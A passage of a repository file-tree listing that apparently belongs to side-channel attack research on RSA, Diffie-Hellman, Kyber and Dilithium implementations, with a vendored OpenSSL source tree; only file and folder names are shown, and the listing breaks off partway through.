├── .gitignore ├── README.md ├── linuxsetup ├── kmod │ ├── Makefile │ └── source │ │ ├── main.c │ │ ├── region.c │ │ ├── sysregs.c │ │ └── uncore-pmu.c └── pmuctl │ ├── Cargo.toml │ └── src │ └── main.rs ├── poc ├── coppersmith.sage.py ├── crypto_accuracy.py ├── crypto_attacker │ ├── Cargo.toml │ ├── build.rs │ ├── ctswap_addr.txt │ ├── dh_addr.txt │ ├── dh_params.pem │ ├── dilithium_addr.txt │ ├── examples │ │ ├── ctswap_attacker.rs │ │ ├── dh_attacker.rs │ │ ├── dilithium_attacker.rs │ │ ├── dyld_search.rs │ │ ├── kyber_attacker.rs │ │ └── rsa_attacker.rs │ ├── kyber_addr.txt │ ├── rsa_addr.txt │ └── src │ │ └── lib.rs ├── crypto_victim │ ├── Cargo.toml │ ├── build.rs │ ├── dh_params.pem │ ├── examples │ │ ├── ctswap_victim.rs │ │ ├── dh_victim.rs │ │ ├── dilithium_victim.rs │ │ ├── kyber_victim.rs │ │ └── rsa_victim.rs │ └── src │ │ └── lib.rs ├── dilithium_data │ ├── README.md │ ├── collection.sh │ └── parse.py ├── dilithium_reduction.py ├── evict-rs │ ├── Cargo.toml │ └── src │ │ ├── allocator.rs │ │ ├── cache_line.rs │ │ ├── eviction_set.rs │ │ ├── lib.rs │ │ ├── multithread_counter.rs │ │ └── timer.rs ├── kyber_reduction.py ├── libaugury-ffi-sys │ ├── Cargo.toml │ ├── build.rs │ └── src │ │ ├── bindings.rs │ │ ├── c_augury.c │ │ ├── c_augury.h │ │ └── lib.rs ├── libdilithium-ffi-sys │ ├── Cargo.toml │ ├── README.md │ ├── build.rs │ └── src │ │ ├── bindings.rs │ │ ├── dilithium.go │ │ ├── ffi.sh │ │ ├── go.mod │ │ ├── go.sum │ │ ├── lib.rs │ │ ├── libdilithium.a │ │ └── libdilithium.h ├── libkyber-ffi-sys │ ├── Cargo.toml │ ├── build.rs │ └── src │ │ ├── api.h │ │ ├── bindings.rs │ │ ├── cbd.c │ │ ├── cbd.h │ │ ├── fips202.c │ │ ├── fips202.h │ │ ├── indcpa.c │ │ ├── indcpa.h │ │ ├── kem.c │ │ ├── kem.h │ │ ├── lib.rs │ │ ├── ntt.c │ │ ├── ntt.h │ │ ├── params.h │ │ ├── poly.c │ │ ├── poly.h │ │ ├── polyvec.c │ │ ├── polyvec.h │ │ ├── reduce.c │ │ ├── reduce.h │ │ ├── rng.c │ │ ├── rng.h │ │ ├── symmetric-shake.c │ │ ├── symmetric.h │ │ ├── verify.c │ │ └── verify.h ├── librsa-ffi-sys │ ├── Cargo.toml │ ├── README.md │ ├── build.rs │ └── src │ │ ├── bindings.rs │ │ ├── ffi.sh │ │ ├── go.mod │ │ ├── lib.rs │ │ ├── librsa.a │ │ ├── librsa.h │ │ └── rsa.go ├── lwe_with_hints │ ├── __init__.py │ ├── lwe_gen.py │ └── lwe_lattice.py ├── openssl-0.10.42 │ ├── .cargo-ok │ ├── .cargo_vcs_info.json │ ├── CHANGELOG.md │ ├── Cargo.toml │ ├── Cargo.toml.orig │ ├── LICENSE │ ├── README.md │ ├── build.rs │ ├── examples │ │ └── mk_certs.rs │ ├── src │ │ ├── aes.rs │ │ ├── asn1.rs │ │ ├── base64.rs │ │ ├── bio.rs │ │ ├── bn.rs │ │ ├── cipher.rs │ │ ├── cipher_ctx.rs │ │ ├── cms.rs │ │ ├── conf.rs │ │ ├── derive.rs │ │ ├── dh.rs │ │ ├── dsa.rs │ │ ├── ec.rs │ │ ├── ecdsa.rs │ │ ├── encrypt.rs │ │ ├── envelope.rs │ │ ├── error.rs │ │ ├── ex_data.rs │ │ ├── fips.rs │ │ ├── hash.rs │ │ ├── lib.rs │ │ ├── lib_ctx.rs │ │ ├── macros.rs │ │ ├── md.rs │ │ ├── md_ctx.rs │ │ ├── memcmp.rs │ │ ├── nid.rs │ │ ├── ocsp.rs │ │ ├── pkcs12.rs │ │ ├── pkcs5.rs │ │ ├── pkcs7.rs │ │ ├── pkey.rs │ │ ├── pkey_ctx.rs │ │ ├── provider.rs │ │ ├── rand.rs │ │ ├── rsa.rs │ │ ├── sha.rs │ │ ├── sign.rs │ │ ├── srtp.rs │ │ ├── ssl │ │ │ ├── bio.rs │ │ │ ├── callbacks.rs │ │ │ ├── connector.rs │ │ │ ├── error.rs │ │ │ ├── mod.rs │ │ │ └── test │ │ │ │ ├── mod.rs │ │ │ │ └── server.rs │ │ ├── stack.rs │ │ ├── string.rs │ │ ├── symm.rs │ │ ├── util.rs │ │ ├── version.rs │ │ └── x509 │ │ │ ├── extension.rs │ │ │ ├── mod.rs │ │ │ ├── store.rs │ │ │ ├── tests.rs │ │ │ └── verify.rs │ └── test │ │ ├── aia_test_cert.pem │ │ ├── alt_name_cert.pem │ │ ├── cert.pem │ │ ├── certs.pem │ │ ├── cms.p12 │ │ ├── cms_pubkey.der │ │ ├── csr.pem │ │ ├── dhparams.pem │ │ ├── dsa.pem │ │ ├── dsa.pem.pub │ │ ├── dsaparam.pem │ │ ├── identity.p12 │ │ ├── key.der │ │ ├── key.der.pub │ │ ├── key.pem │ │ ├── key.pem.pub │ │ ├── keystore-empty-chain.p12 │ │ ├── nid_test_cert.pem │ │ ├── nid_uid_test_cert.pem │ │ ├── pkcs1.pem.pub │ │ ├── pkcs8-nocrypt.der │ │ ├── pkcs8.der │ │ ├── root-ca.key │ │ ├── root-ca.pem │ │ ├── rsa-encrypted.pem │ │ ├── rsa.pem │ │ └── rsa.pem.pub ├── openssl-macros-0.1.0 │ ├── .cargo-ok │ ├── .cargo_vcs_info.json │ ├── Cargo.toml │ ├── Cargo.toml.orig │ ├── LICENSE-APACHE │ ├── LICENSE-MIT │ └── src │ │ └── lib.rs ├── openssl-src-111.22.0+1.1.1q │ ├── .cargo-ok │ ├── .cargo_vcs_info.json │ ├── .github │ │ ├── dependabot.yml │ │ └── workflows │ │ │ └── main.yml │ ├── .gitignore │ ├── .gitmodules │ ├── Cargo.toml │ ├── Cargo.toml.orig │ ├── LICENSE-APACHE │ ├── LICENSE-MIT │ ├── README.md │ ├── ci │ │ ├── docker │ │ │ ├── aarch64-linux-android │ │ │ │ └── Dockerfile │ │ │ ├── aarch64-unknown-linux-gnu │ │ │ │ └── Dockerfile │ │ │ ├── arm-linux-androideabi │ │ │ │ └── Dockerfile │ │ │ ├── arm-unknown-linux-gnueabi │ │ │ │ └── Dockerfile │ │ │ ├── asmjs-unknown-emscripten │ │ │ │ └── Dockerfile │ │ │ ├── i686-linux-android │ │ │ │ └── Dockerfile │ │ │ ├── i686-unknown-linux-gnu │ │ │ │ └── Dockerfile │ │ │ ├── x86_64-linux-android │ │ │ │ └── Dockerfile │ │ │ ├── x86_64-pc-windows-gnu │ │ │ │ └── Dockerfile │ │ │ ├── x86_64-unknown-linux-gnu │ │ │ │ └── Dockerfile │ │ │ └── x86_64-unknown-linux-musl │ │ │ │ └── Dockerfile │ │ ├── run-docker.sh │ │ └── run.sh │ ├── openssl │ │ ├── ACKNOWLEDGEMENTS │ │ ├── AUTHORS │ │ ├── CHANGES │ │ ├── CONTRIBUTING │ │ ├── Configurations │ │ │ ├── 00-base-templates.conf │ │ │ ├── 10-main.conf │ │ │ ├── 15-android.conf │ │ │ ├── 15-ios.conf │ │ │ ├── 50-djgpp.conf │ │ │ ├── 50-haiku.conf │ │ │ ├── 50-masm.conf │ │ │ ├── 50-win-onecore.conf │ │ │ ├── INTERNALS.Configure │ │ │ ├── README │ │ │ ├── README.design │ │ │ ├── common.tmpl │ │ │ ├── common0.tmpl │ │ │ ├── descrip.mms.tmpl │ │ │ ├── shared-info.pl │ │ │ ├── unix-Makefile.tmpl │ │ │ ├── unix-checker.pm │ │ │ ├── windows-checker.pm │ │ │ └── windows-makefile.tmpl │ │ ├── Configure │ │ ├── FAQ │ │ ├── INSTALL │ │ ├── LICENSE │ │ ├── NEWS │ │ ├── NOTES.ANDROID │ │ ├── NOTES.DJGPP │ │ ├── NOTES.PERL │ │ ├── NOTES.UNIX │ │ ├── NOTES.VMS │ │ ├── NOTES.WIN │ │ ├── README │ │ ├── README.ENGINE │ │ ├── README.FIPS │ │ ├── VMS │ │ │ ├── VMSify-conf.pl │ │ │ ├── engine.opt │ │ │ ├── msg_install.com │ │ │ ├── msg_staging.com │ │ │ ├── openssl_ivp.com.in │ │ │ ├── openssl_shutdown.com.in │ │ │ ├── openssl_startup.com.in │ │ │ ├── openssl_utils.com.in │ │ │ ├── test-includes.com │ │ │ └── translatesyms.pl │ │ ├── apps │ │ │ ├── CA.pl.in │ │ │ ├── app_rand.c │ │ │ ├── apps.c │ │ │ ├── apps.h │ │ │ ├── asn1pars.c │ │ │ ├── bf_prefix.c │ │ │ ├── build.info │ │ │ ├── ca-cert.srl │ │ │ ├── ca-key.pem │ │ │ ├── ca-req.pem │ │ │ ├── ca.c │ │ │ ├── cert.pem │ │ │ ├── ciphers.c │ │ │ ├── client.pem │ │ │ ├── cms.c │ │ │ ├── crl.c │ │ │ ├── crl2p7.c │ │ │ ├── ct_log_list.cnf │ │ │ ├── demoSRP │ │ │ │ └── srp_verifier.txt.attr │ │ │ ├── dgst.c │ │ │ ├── dh1024.pem │ │ │ ├── dh2048.pem │ │ │ ├── dh4096.pem │ │ │ ├── dhparam.c │ │ │ ├── dsa-ca.pem │ │ │ ├── dsa-pca.pem │ │ │ ├── dsa.c │ │ │ ├── dsa1024.pem │ │ │ ├── dsa512.pem │ │ │ ├── dsap.pem │ │ │ ├── dsaparam.c │ │ │ ├── ec.c │ │ │ ├── ecparam.c │ │ │ ├── enc.c │ │ │ ├── engine.c │ │ │ ├── errstr.c │ │ │ ├── gendsa.c │ │ │ ├── genpkey.c │ │ │ ├── genrsa.c │ │ │ ├── nseq.c │ │ │ ├── ocsp.c │ │ │ ├── openssl-vms.cnf │ │ │ ├── openssl.c │ │ │ ├── openssl.cnf │ │ │ ├── opt.c │ │ │ ├── passwd.c │ │ │ ├── pca-cert.srl │ │ │ ├── pca-key.pem │ │ │ ├── pca-req.pem │ │ │ ├── pkcs12.c │ │ │ ├── pkcs7.c │ │ │ ├── pkcs8.c │ │ │ ├── pkey.c │ │ │ ├── pkeyparam.c │ │ │ ├── pkeyutl.c │ │ │ ├── prime.c │ │ │ ├── privkey.pem │ │ │ ├── progs.pl │ │ │ ├── rand.c │ │ │ ├── rehash.c │ │ │ ├── req.c │ │ │ ├── req.pem │ │ │ ├── rsa.c │ │ │ ├── rsa8192.pem │ │ │ ├── rsautl.c │ │ │ ├── s1024key.pem │ │ │ ├── s1024req.pem │ │ │ ├── s512-key.pem │ │ │ ├── s512-req.pem │ │ │ ├── s_apps.h │ │ │ ├── s_cb.c │ │ │ ├── s_client.c │ │ │ ├── s_server.c │ │ │ ├── s_socket.c │ │ │ ├── s_time.c │ │ │ ├── server.pem │ │ │ ├── server.srl │ │ │ ├── server2.pem │ │ │ ├── sess_id.c │ │ │ ├── smime.c │ │ │ ├── speed.c │ │ │ ├── spkac.c │ │ │ ├── srp.c │ │ │ ├── storeutl.c │ │ │ ├── testCA.pem │ │ │ ├── testdsa.h │ │ │ ├── testrsa.h │ │ │ ├── timeouts.h │ │ │ ├── ts.c │ │ │ ├── tsget.in │ │ │ ├── verify.c │ │ │ ├── version.c │ │ │ ├── vms_decc_argv.c │ │ │ ├── vms_decc_init.c │ │ │ ├── vms_term_sock.c │ │ │ ├── vms_term_sock.h │ │ │ ├── win32_init.c │ │ │ └── x509.c │ │ ├── appveyor.yml │ │ ├── build.info │ │ ├── config │ │ ├── config.com │ │ ├── crypto │ │ │ ├── LPdir_nyi.c │ │ │ ├── LPdir_unix.c │ │ │ ├── LPdir_vms.c │ │ │ ├── LPdir_win.c │ │ │ ├── LPdir_win32.c │ │ │ ├── LPdir_wince.c │ │ │ ├── aes │ │ │ │ ├── aes_cbc.c │ │ │ │ ├── aes_cfb.c │ │ │ │ ├── aes_core.c │ │ │ │ ├── aes_ecb.c │ │ │ │ ├── aes_ige.c │ │ │ │ ├── aes_local.h │ │ │ │ ├── aes_misc.c │ │ │ │ ├── aes_ofb.c │ │ │ │ ├── aes_wrap.c │ │ │ │ ├── aes_x86core.c │ │ │ │ ├── asm │ │ │ │ │ ├── aes-armv4.pl │ │ │ │ │ ├── aes-c64xplus.pl │ │ │ │ │ ├── aes-ia64.S │ │ │ │ │ ├── aes-mips.pl │ │ │ │ │ ├── aes-parisc.pl │ │ │ │ │ ├── aes-ppc.pl │ │ │ │ │ ├── aes-s390x.pl │ │ │ │ │ ├── aes-sparcv9.pl │ │ │ │ │ ├── aesfx-sparcv9.pl │ │ │ │ │ ├── aesni-mb-x86_64.pl │ │ │ │ │ ├── aesni-sha1-x86_64.pl │ │ │ │ │ ├── aesni-sha256-x86_64.pl │ │ │ │ │ ├── aesni-x86.pl │ │ │ │ │ ├── aesni-x86_64.pl │ │ │ │ │ ├── aesp8-ppc.pl │ │ │ │ │ ├── aest4-sparcv9.pl │ │ │ │ │ ├── aesv8-armx.pl │ │ │ │ │ ├── bsaes-armv7.pl │ │ │ │ │ ├── vpaes-armv8.pl │ │ │ │ │ ├── vpaes-ppc.pl │ │ │ │ │ ├── vpaes-x86.pl │ │ │ │ │ └── vpaes-x86_64.pl │ │ │ │ └── build.info │ │ │ ├── alphacpuid.pl │ │ │ ├── aria │ │ │ │ ├── aria.c │ │ │ │ └── build.info │ │ │ ├── arm64cpuid.pl │ │ │ ├── arm_arch.h │ │ │ ├── armcap.c │ │ │ ├── armv4cpuid.pl │ │ │ ├── asn1 │ │ │ │ ├── a_bitstr.c │ │ │ │ ├── a_d2i_fp.c │ │ │ │ ├── a_digest.c │ │ │ │ ├── a_dup.c │ │ │ │ ├── a_gentm.c │ │ │ │ ├── a_i2d_fp.c │ │ │ │ ├── a_int.c │ │ │ │ ├── a_mbstr.c │ │ │ │ ├── a_object.c │ │ │ │ ├── a_octet.c │ │ │ │ ├── a_print.c │ │ │ │ ├── a_sign.c │ │ │ │ ├── a_strex.c │ │ │ │ ├── a_strnid.c │ │ │ │ ├── a_time.c │ │ │ │ ├── a_type.c │ │ │ │ ├── a_utctm.c │ │ │ │ ├── a_utf8.c │ │ │ │ ├── a_verify.c │ │ │ │ ├── ameth_lib.c │ │ │ │ ├── asn1_err.c │ │ │ │ ├── asn1_gen.c │ │ │ │ ├── asn1_item_list.c │ │ │ │ ├── asn1_item_list.h │ │ │ │ ├── asn1_lib.c │ │ │ │ ├── asn1_local.h │ │ │ │ ├── asn1_par.c │ │ │ │ ├── asn_mime.c │ │ │ │ ├── asn_moid.c │ │ │ │ ├── asn_mstbl.c │ │ │ │ ├── asn_pack.c │ │ │ │ ├── bio_asn1.c │ │ │ │ ├── bio_ndef.c │ │ │ │ ├── build.info │ │ │ │ ├── charmap.h │ │ │ │ ├── charmap.pl │ │ │ │ ├── d2i_pr.c │ │ │ │ ├── d2i_pu.c │ │ │ │ ├── evp_asn1.c │ │ │ │ ├── f_int.c │ │ │ │ ├── f_string.c │ │ │ │ ├── i2d_pr.c │ │ │ │ ├── i2d_pu.c │ │ │ │ ├── n_pkey.c │ │ │ │ ├── nsseq.c │ │ │ │ ├── p5_pbe.c │ │ │ │ ├── p5_pbev2.c │ │ │ │ ├── p5_scrypt.c │ │ │ │ ├── p8_pkey.c │ │ │ │ ├── standard_methods.h │ │ │ │ ├── t_bitst.c │ │ │ │ ├── t_pkey.c │ │ │ │ ├── t_spki.c │ │ │ │ ├── tasn_dec.c │ │ │ │ ├── tasn_enc.c │ │ │ │ ├── tasn_fre.c │ │ │ │ ├── tasn_new.c │ │ │ │ ├── tasn_prn.c │ │ │ │ ├── tasn_scn.c │ │ │ │ ├── tasn_typ.c │ │ │ │ ├── tasn_utl.c │ │ │ │ ├── tbl_standard.h │ │ │ │ ├── x_algor.c │ │ │ │ ├── x_bignum.c │ │ │ │ ├── x_info.c │ │ │ │ ├── x_int64.c │ │ │ │ ├── x_long.c │ │ │ │ ├── x_pkey.c │ │ │ │ ├── x_sig.c │ │ │ │ ├── x_spki.c │ │ │ │ └── x_val.c │ │ │ ├── async │ │ │ │ ├── arch │ │ │ │ │ ├── async_null.c │ │ │ │ │ ├── async_null.h │ │ │ │ │ ├── async_posix.c │ │ │ │ │ ├── async_posix.h │ │ │ │ │ ├── async_win.c │ │ │ │ │ └── async_win.h │ │ │ │ ├── async.c │ │ │ │ ├── async_err.c │ │ │ │ ├── async_local.h │ │ │ │ ├── async_wait.c │ │ │ │ └── build.info │ │ │ ├── bf │ │ │ │ ├── asm │ │ │ │ │ └── bf-586.pl │ │ │ │ ├── bf_cfb64.c │ │ │ │ ├── bf_ecb.c │ │ │ │ ├── bf_enc.c │ │ │ │ ├── bf_local.h │ │ │ │ ├── bf_ofb64.c │ │ │ │ ├── bf_pi.h │ │ │ │ ├── bf_skey.c │ │ │ │ └── build.info │ │ │ ├── bio │ │ │ │ ├── b_addr.c │ │ │ │ ├── b_dump.c │ │ │ │ ├── b_print.c │ │ │ │ ├── b_sock.c │ │ │ │ ├── b_sock2.c │ │ │ │ ├── bf_buff.c │ │ │ │ ├── bf_lbuf.c │ │ │ │ ├── bf_nbio.c │ │ │ │ ├── bf_null.c │ │ │ │ ├── bio_cb.c │ │ │ │ ├── bio_err.c │ │ │ │ ├── bio_lib.c │ │ │ │ ├── bio_local.h │ │ │ │ ├── bio_meth.c │ │ │ │ ├── bss_acpt.c │ │ │ │ ├── bss_bio.c │ │ │ │ ├── bss_conn.c │ │ │ │ ├── bss_dgram.c │ │ │ │ ├── bss_fd.c │ │ │ │ ├── bss_file.c │ │ │ │ ├── bss_log.c │ │ │ │ ├── bss_mem.c │ │ │ │ ├── bss_null.c │ │ │ │ ├── bss_sock.c │ │ │ │ └── build.info │ │ │ ├── blake2 │ │ │ │ ├── blake2_impl.h │ │ │ │ ├── blake2_local.h │ │ │ │ ├── blake2b.c │ │ │ │ ├── blake2s.c │ │ │ │ ├── build.info │ │ │ │ ├── m_blake2b.c │ │ │ │ └── m_blake2s.c │ │ │ ├── bn │ │ │ │ ├── README.pod │ │ │ │ ├── asm │ │ │ │ │ ├── alpha-mont.pl │ │ │ │ │ ├── armv4-gf2m.pl │ │ │ │ │ ├── armv4-mont.pl │ │ │ │ │ ├── armv8-mont.pl │ │ │ │ │ ├── bn-586.pl │ │ │ │ │ ├── bn-c64xplus.asm │ │ │ │ │ ├── c64xplus-gf2m.pl │ │ │ │ │ ├── co-586.pl │ │ │ │ │ ├── ia64-mont.pl │ │ │ │ │ ├── ia64.S │ │ │ │ │ ├── mips-mont.pl │ │ │ │ │ ├── mips.pl │ │ │ │ │ ├── parisc-mont.pl │ │ │ │ │ ├── ppc-mont.pl │ │ │ │ │ ├── ppc.pl │ │ │ │ │ ├── ppc64-mont.pl │ │ │ │ │ ├── rsaz-avx2.pl │ │ │ │ │ ├── rsaz-x86_64.pl │ │ │ │ │ ├── s390x-gf2m.pl │ │ │ │ │ ├── s390x-mont.pl │ │ │ │ │ ├── s390x.S │ │ │ │ │ ├── sparct4-mont.pl │ │ │ │ │ ├── sparcv8.S │ │ │ │ │ ├── sparcv8plus.S │ │ │ │ │ ├── sparcv9-gf2m.pl │ │ │ │ │ ├── sparcv9-mont.pl │ │ │ │ │ ├── sparcv9a-mont.pl │ │ │ │ │ ├── via-mont.pl │ │ │ │ │ ├── vis3-mont.pl │ │ │ │ │ ├── x86-gf2m.pl │ │ │ │ │ ├── x86-mont.pl │ │ │ │ │ ├── x86_64-gcc.c │ │ │ │ │ ├── x86_64-gf2m.pl │ │ │ │ │ ├── x86_64-mont.pl │ │ │ │ │ └── x86_64-mont5.pl │ │ │ │ ├── bn_add.c │ │ │ │ ├── bn_asm.c │ │ │ │ ├── bn_blind.c │ │ │ │ ├── bn_const.c │ │ │ │ ├── bn_ctx.c │ │ │ │ ├── bn_depr.c │ │ │ │ ├── bn_dh.c │ │ │ │ ├── bn_div.c │ │ │ │ ├── bn_err.c │ │ │ │ ├── bn_exp.c │ │ │ │ ├── bn_exp2.c │ │ │ │ ├── bn_gcd.c │ │ │ │ ├── bn_gf2m.c │ │ │ │ ├── bn_intern.c │ │ │ │ ├── bn_kron.c │ │ │ │ ├── bn_lib.c │ │ │ │ ├── bn_local.h │ │ │ │ ├── bn_mod.c │ │ │ │ ├── bn_mont.c │ │ │ │ ├── bn_mpi.c │ │ │ │ ├── bn_mul.c │ │ │ │ ├── bn_nist.c │ │ │ │ ├── bn_prime.c │ │ │ │ ├── bn_prime.h │ │ │ │ ├── bn_prime.pl │ │ │ │ ├── bn_print.c │ │ │ │ ├── bn_rand.c │ │ │ │ ├── bn_recp.c │ │ │ │ ├── bn_shift.c │ │ │ │ ├── bn_sqr.c │ │ │ │ ├── bn_sqrt.c │ │ │ │ ├── bn_srp.c │ │ │ │ ├── bn_word.c │ │ │ │ ├── bn_x931p.c │ │ │ │ ├── build.info │ │ │ │ ├── rsaz_exp.c │ │ │ │ └── rsaz_exp.h │ │ │ ├── buffer │ │ │ │ ├── buf_err.c │ │ │ │ ├── buffer.c │ │ │ │ └── build.info │ │ │ ├── build.info │ │ │ ├── c64xpluscpuid.pl │ │ │ ├── camellia │ │ │ │ ├── asm │ │ │ │ │ ├── cmll-x86.pl │ │ │ │ │ ├── cmll-x86_64.pl │ │ │ │ │ └── cmllt4-sparcv9.pl │ │ │ │ ├── build.info │ │ │ │ ├── camellia.c │ │ │ │ ├── cmll_cbc.c │ │ │ │ ├── cmll_cfb.c │ │ │ │ ├── cmll_ctr.c │ │ │ │ ├── cmll_ecb.c │ │ │ │ ├── cmll_local.h │ │ │ │ ├── cmll_misc.c │ │ │ │ └── cmll_ofb.c │ │ │ ├── cast │ │ │ │ ├── asm │ │ │ │ │ └── cast-586.pl │ │ │ │ ├── build.info │ │ │ │ ├── c_cfb64.c │ │ │ │ ├── c_ecb.c │ │ │ │ ├── c_enc.c │ │ │ │ ├── c_ofb64.c │ │ │ │ ├── c_skey.c │ │ │ │ ├── cast_local.h │ │ │ │ └── cast_s.h │ │ │ ├── chacha │ │ │ │ ├── asm │ │ │ │ │ ├── chacha-armv4.pl │ │ │ │ │ ├── chacha-armv8.pl │ │ │ │ │ ├── chacha-c64xplus.pl │ │ │ │ │ ├── chacha-ppc.pl │ │ │ │ │ ├── chacha-s390x.pl │ │ │ │ │ ├── chacha-x86.pl │ │ │ │ │ └── chacha-x86_64.pl │ │ │ │ ├── build.info │ │ │ │ └── chacha_enc.c │ │ │ ├── cmac │ │ │ │ ├── build.info │ │ │ │ ├── cm_ameth.c │ │ │ │ ├── cm_pmeth.c │ │ │ │ └── cmac.c │ │ │ ├── cms │ │ │ │ ├── build.info │ │ │ │ ├── cms_asn1.c │ │ │ │ ├── cms_att.c │ │ │ │ ├── cms_cd.c │ │ │ │ ├── cms_dd.c │ │ │ │ ├── cms_enc.c │ │ │ │ ├── cms_env.c │ │ │ │ ├── cms_err.c │ │ │ │ ├── cms_ess.c │ │ │ │ ├── cms_io.c │ │ │ │ ├── cms_kari.c │ │ │ │ ├── cms_lib.c │ │ │ │ ├── cms_local.h │ │ │ │ ├── cms_pwri.c │ │ │ │ ├── cms_sd.c │ │ │ │ └── cms_smime.c │ │ │ ├── comp │ │ │ │ ├── build.info │ │ │ │ ├── c_zlib.c │ │ │ │ ├── comp_err.c │ │ │ │ ├── comp_lib.c │ │ │ │ └── comp_local.h │ │ │ ├── conf │ │ │ │ ├── build.info │ │ │ │ ├── conf_api.c │ │ │ │ ├── conf_def.c │ │ │ │ ├── conf_def.h │ │ │ │ ├── conf_err.c │ │ │ │ ├── conf_lib.c │ │ │ │ ├── conf_local.h │ │ │ │ ├── conf_mall.c │ │ │ │ ├── conf_mod.c │ │ │ │ ├── conf_sap.c │ │ │ │ ├── conf_ssl.c │ │ │ │ └── keysets.pl │ │ │ ├── cpt_err.c │ │ │ ├── cryptlib.c │ │ │ ├── ct │ │ │ │ ├── build.info │ │ │ │ ├── ct_b64.c │ │ │ │ ├── ct_err.c │ │ │ │ ├── ct_local.h │ │ │ │ ├── ct_log.c │ │ │ │ ├── ct_oct.c │ │ │ │ ├── ct_policy.c │ │ │ │ ├── ct_prn.c │ │ │ │ ├── ct_sct.c │ │ │ │ ├── ct_sct_ctx.c │ │ │ │ ├── ct_vfy.c │ │ │ │ └── ct_x509v3.c │ │ │ ├── ctype.c │ │ │ ├── cversion.c │ │ │ ├── des │ │ │ │ ├── asm │ │ │ │ │ ├── crypt586.pl │ │ │ │ │ ├── des-586.pl │ │ │ │ │ ├── des_enc.m4 │ │ │ │ │ ├── desboth.pl │ │ │ │ │ └── dest4-sparcv9.pl │ │ │ │ ├── build.info │ │ │ │ ├── cbc_cksm.c │ │ │ │ ├── cbc_enc.c │ │ │ │ ├── cfb64ede.c │ │ │ │ ├── cfb64enc.c │ │ │ │ ├── cfb_enc.c │ │ │ │ ├── des_enc.c │ │ │ │ ├── des_local.h │ │ │ │ ├── ecb3_enc.c │ │ │ │ ├── ecb_enc.c │ │ │ │ ├── fcrypt.c │ │ │ │ ├── fcrypt_b.c │ │ │ │ ├── ncbc_enc.c │ │ │ │ ├── ofb64ede.c │ │ │ │ ├── ofb64enc.c │ │ │ │ ├── ofb_enc.c │ │ │ │ ├── pcbc_enc.c │ │ │ │ ├── qud_cksm.c │ │ │ │ ├── rand_key.c │ │ │ │ ├── set_key.c │ │ │ │ ├── spr.h │ │ │ │ ├── str2key.c │ │ │ │ └── xcbc_enc.c │ │ │ ├── dh │ │ │ │ ├── build.info │ │ │ │ ├── dh1024.pem │ │ │ │ ├── dh192.pem │ │ │ │ ├── dh2048.pem │ │ │ │ ├── dh4096.pem │ │ │ │ ├── dh512.pem │ │ │ │ ├── dh_ameth.c │ │ │ │ ├── dh_asn1.c │ │ │ │ ├── dh_check.c │ │ │ │ ├── dh_depr.c │ │ │ │ ├── dh_err.c │ │ │ │ ├── dh_gen.c │ │ │ │ ├── dh_kdf.c │ │ │ │ ├── dh_key.c │ │ │ │ ├── dh_lib.c │ │ │ │ ├── dh_local.h │ │ │ │ ├── dh_meth.c │ │ │ │ ├── dh_pmeth.c │ │ │ │ ├── dh_prn.c │ │ │ │ ├── dh_rfc5114.c │ │ │ │ └── dh_rfc7919.c │ │ │ ├── dllmain.c │ │ │ ├── dsa │ │ │ │ ├── build.info │ │ │ │ ├── dsa_ameth.c │ │ │ │ ├── dsa_asn1.c │ │ │ │ ├── dsa_depr.c │ │ │ │ ├── dsa_err.c │ │ │ │ ├── dsa_gen.c │ │ │ │ ├── dsa_key.c │ │ │ │ ├── dsa_lib.c │ │ │ │ ├── dsa_local.h │ │ │ │ ├── dsa_meth.c │ │ │ │ ├── dsa_ossl.c │ │ │ │ ├── dsa_pmeth.c │ │ │ │ ├── dsa_prn.c │ │ │ │ ├── dsa_sign.c │ │ │ │ └── dsa_vrf.c │ │ │ ├── dso │ │ │ │ ├── build.info │ │ │ │ ├── dso_dl.c │ │ │ │ ├── dso_dlfcn.c │ │ │ │ ├── dso_err.c │ │ │ │ ├── dso_lib.c │ │ │ │ ├── dso_local.h │ │ │ │ ├── dso_openssl.c │ │ │ │ ├── dso_vms.c │ │ │ │ └── dso_win32.c │ │ │ ├── ebcdic.c │ │ │ ├── ec │ │ │ │ ├── asm │ │ │ │ │ ├── ecp_nistz256-armv4.pl │ │ │ │ │ ├── ecp_nistz256-armv8.pl │ │ │ │ │ ├── ecp_nistz256-ppc64.pl │ │ │ │ │ ├── ecp_nistz256-sparcv9.pl │ │ │ │ │ ├── ecp_nistz256-x86.pl │ │ │ │ │ ├── ecp_nistz256-x86_64.pl │ │ │ │ │ ├── x25519-ppc64.pl │ │ │ │ │ └── x25519-x86_64.pl │ │ │ │ ├── build.info │ │ │ │ ├── curve25519.c │ │ │ │ ├── curve448 │ │ │ │ │ ├── arch_32 │ │ │ │ │ │ ├── arch_intrinsics.h │ │ │ │ │ │ ├── f_impl.c │ │ │ │ │ │ └── f_impl.h │ │ │ │ │ ├── curve448.c │ │ │ │ │ ├── curve448_local.h │ │ │ │ │ ├── curve448_tables.c │ │ │ │ │ ├── curve448utils.h │ │ │ │ │ ├── ed448.h │ │ │ │ │ ├── eddsa.c │ │ │ │ │ ├── f_generic.c │ │ │ │ │ ├── field.h │ │ │ │ │ ├── point_448.h │ │ │ │ │ ├── scalar.c │ │ │ │ │ └── word.h │ │ │ │ ├── ec2_oct.c │ │ │ │ ├── ec2_smpl.c │ │ │ │ ├── ec_ameth.c │ │ │ │ ├── ec_asn1.c │ │ │ │ ├── ec_check.c │ │ │ │ ├── ec_curve.c │ │ │ │ ├── ec_cvt.c │ │ │ │ ├── ec_err.c │ │ │ │ ├── ec_key.c │ │ │ │ ├── ec_kmeth.c │ │ │ │ ├── ec_lib.c │ │ │ │ ├── ec_local.h │ │ │ │ ├── ec_mult.c │ │ │ │ ├── ec_oct.c │ │ │ │ ├── ec_pmeth.c │ │ │ │ ├── ec_print.c │ │ │ │ ├── ecdh_kdf.c │ │ │ │ ├── ecdh_ossl.c │ │ │ │ ├── ecdsa_ossl.c │ │ │ │ ├── ecdsa_sign.c │ │ │ │ ├── ecdsa_vrf.c │ │ │ │ ├── eck_prn.c │ │ │ │ ├── ecp_mont.c │ │ │ │ ├── ecp_nist.c │ │ │ │ ├── ecp_nistp224.c │ │ │ │ ├── ecp_nistp256.c │ │ │ │ ├── ecp_nistp521.c │ │ │ │ ├── ecp_nistputil.c │ │ │ │ ├── ecp_nistz256.c │ │ │ │ ├── ecp_nistz256_table.c │ │ │ │ ├── ecp_oct.c │ │ │ │ ├── ecp_smpl.c │ │ │ │ └── ecx_meth.c │ │ │ ├── engine │ │ │ │ ├── README │ │ │ │ ├── build.info │ │ │ │ ├── eng_all.c │ │ │ │ ├── 